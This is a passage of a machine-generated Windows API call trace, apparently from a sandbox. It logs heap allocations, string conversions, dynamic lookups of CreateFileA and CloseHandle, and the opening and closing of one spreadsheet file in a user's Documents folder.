(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.566] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c838 [0033.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.566] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0033.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x88ffb0 [0033.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", cchWideChar=95, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5f) returned 0x87a9d8 [0033.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", cchWideChar=95, lpMultiByteStr=0x87a9d8, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods", lpUsedDefaultChar=0x0) returned 95 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.567] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\bn3xfsxkp2nprmt.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.567] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0033.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=95, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xbe) returned 0x7c5448 [0033.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x88ffb0, cbMultiByte=95, lpWideCharStr=0x7c5448, cchWideChar=95 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods") returned 95 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c50e0 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.569] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0033.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.571] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0033.571] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.571] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.572] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.572] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0033.572] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889220 [0033.572] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889220, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0033.572] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.573] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.573] CloseHandle (hObject=0x140) returned 1 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.573] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0033.573] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0033.573] HeapFree (in: 